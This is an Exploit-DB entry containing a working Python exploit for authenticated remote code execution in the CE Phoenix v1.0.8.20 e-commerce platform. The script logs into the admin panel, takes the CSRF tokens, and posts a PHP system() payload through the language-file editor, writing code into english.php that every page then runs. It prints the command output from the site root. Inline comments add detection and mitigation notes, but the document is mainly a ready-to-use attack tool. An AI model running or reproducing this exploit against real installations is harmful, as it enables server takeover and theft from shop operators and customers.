CE Phoenix v1.0.8.20 – Remote Code Execution

  • 作者: tmrswrr
    日期: 2024-04-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51957/
  • ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
    #### Date: 2023-11-25
    #### Exploit Author: tmrswrr
    #### Category: Webapps
    #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
    #### Version: v1.0.8.20
    #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)
    
    ## EXPLOIT :
    
    import requests
    from bs4 import BeautifulSoup
    import sys
    import urllib.parse
    import random
    from time import sleep
    
    class colors:
        """ANSI escape sequences used to colour the terminal banner.

        Plain constants only; ``ENDC`` resets the terminal back to its default
        attributes after one of the other codes has been printed.
        """

        # Text attributes
        BOLD = '\033[1m'
        UNDERLINE = '\033[4m'
        ENDC = '\033[0m'

        # Bright / "status" foreground colours
        OKBLUE = '\033[94m'
        WARNING = '\033[93m'
        FAIL = '\033[91m'

        # Standard 8-colour foreground palette
        CBLACK = '\33[30m'
        CRED = '\33[31m'
        CGREEN = '\33[32m'
        CYELLOW = '\33[33m'
        CBLUE = '\33[34m'
        CVIOLET = '\33[35m'
        CBEIGE = '\33[36m'
        CWHITE = '\33[37m'
    
     
    def entry_banner():
        """Print the tool banner character by character in a randomly picked colour.

        Side effects only: writes to stdout (flushing after every character) and
        sleeps briefly between characters to produce a typewriter effect.
        """
        palette = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
                   colors.CRED, colors.CBEIGE]
        random.shuffle(palette)
        chosen = palette[0]

        text = chosen + """
     CE Phoenix v1.0.8.20 - Remote Code Execution \n
     Author: tmrswrr
    """
        write = sys.stdout.write
        flush = sys.stdout.flush
        for ch in text:
            # print(char, end='') is equivalent to a bare write of the character
            write(ch)
            flush()
            sleep(0.0045)
    
    def get_formid_and_cookies(session, url):
        """Fetch *url* and extract the ``formid`` anti-CSRF token from the returned HTML.

        Args:
            session: requests.Session used for the GET; its cookie jar is returned
                unchanged alongside the token.
            url: Page to fetch. Redirects are followed, so the token comes from the
                final page in the chain.

        Returns:
            ``(formid, session.cookies)`` when the response status is OK and the page
            contains an ``<input name="formid">`` element; otherwise ``(None, None)``.
        """
        response = session.get(url, allow_redirects=True)
        if response.ok:
            soup = BeautifulSoup(response.text, 'html.parser')
            formid_input = soup.find('input', {'name': 'formid'})
            if formid_input:
                # NOTE(review): an input element without a ``value`` attribute would
                # raise KeyError here rather than fall through to (None, None).
                return formid_input['value'], session.cookies
        return None, None
    
    def perform_exploit(session, url, username, password, command):
        """Authenticate to the CE Phoenix admin panel and submit *command* via the language-file editor.

        Sequence, as written below: GET ``admin/define_language.php`` to obtain a
        ``formid`` token, POST the admin credentials to ``admin/login.php?action=process``,
        read a fresh ``formid`` from the post-login page, POST a ``file_contents`` body to
        ``admin/define_language.php?...&action=save``, then GET the site root and print
        its HTML so any output embedded in the page is visible.

        Args:
            session: requests.Session that carries cookies between the requests.
            url: Base URL of the installation, without a trailing slash (it is used as a
                plain string prefix).
            username, password: Admin credentials; the issue is authenticated-only.
            command: String that is URL-encoded and embedded in the posted
                ``file_contents`` value.

        Returns:
            None. Progress messages and the final page body are printed to stdout.

        Raises:
            KeyError: if the first GET did not set a ``cepcAdminID`` cookie.
        """
        print("\n[+] Attempting to exploit the target...")

        initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
        formid, cookies = get_formid_and_cookies(session, initial_url)
        if not formid:
            print("[-] Failed to retrieve initial formid.")
            return

        # Login
        print("[+] Performing login...")
        login_payload = {
            'formid': formid,
            'username': username,
            'password': password
        }
        # The session already stores cookies; the explicit Cookie header duplicates the
        # admin session id and raises KeyError if the server never set it.
        login_headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
            'Referer': initial_url
        }
        login_url = url + "/admin/login.php?action=process"
        login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)

        # ``.ok`` only tests the HTTP status (< 400); a rejected login that renders the
        # form again with 200 is still reported as successful here.
        if not login_response.ok:
            print("[-] Login failed.")
            print(login_response.text)
            return

        print("[+] Login successful.")

        # A new token is issued after login; reuse of the pre-login one is not attempted.
        new_formid, _ = get_formid_and_cookies(session, login_response.url)
        if not new_formid:
            print("[-] Failed to retrieve new formid after login.")
            return

        # Exploit
        print("[+] Executing the exploit...")
        # Defender notes: the decisive request is the POST to
        # define_language.php?...&action=save below. The file_contents value decodes to a
        # PHP open tag followed by a system() call, which indicates the editor saves the
        # posted text into english.php without filtering (server-side behaviour is not
        # visible here - confirm against the application source).
        # Detection: POST requests to /admin/define_language.php with action=save whose
        # body contains "<?php" (URL-encoded as %3C%3Fphp), followed by a GET of the site
        # root from the same client. Mitigation: admin credentials are
        # code-execution-equivalent in this version, so gate /admin (MFA, IP allow-list),
        # keep language files non-writable by the web server user, and monitor them for
        # unexpected changes.
        encoded_command = urllib.parse.quote_plus(command)
        exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
        exploit_headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
            'Referer': login_response.url
        }
        exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
        exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)

        # Again only the HTTP status is checked; the save is not verified otherwise.
        if exploit_response.ok:
            print("[+] Exploit executed successfully.")
        else:
            print("[-] Exploit failed.")
            print(exploit_response.text)

        # The site root is fetched (and printed in full) regardless of the result above,
        # on the assumption that the saved language file is included by every page.
        final_response = session.get(url)
        print("\n[+] Executed Command Output:\n")
        print(final_response.text)
    
    def main(base_url, username, password, command):
        """Create a requests.Session and run perform_exploit against *base_url*.

        Args:
            base_url: Target base URL, passed through unchanged (no trailing slash).
            username, password: Admin credentials.
            command: String embedded in the posted file body by perform_exploit.

        Returns:
            None; all output goes to stdout.
        """
        print("\n[+] Starting the exploitation process...")
        session = requests.Session()
        perform_exploit(session, base_url, username, password, command)
    
    if __name__ == "__main__":
        # CLI entry point: print the banner, then require four positional arguments.
        entry_banner()

        if len(sys.argv) < 5:
            print("Usage: python script.py [URL] [username] [password] [command]")
            sys.exit(1)

        # Arguments are used verbatim: the URL becomes a string prefix for the admin
        # paths, so it must include the scheme and carry no trailing slash.
        base_url = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
        command = sys.argv[4]

        main(base_url, username, password, command)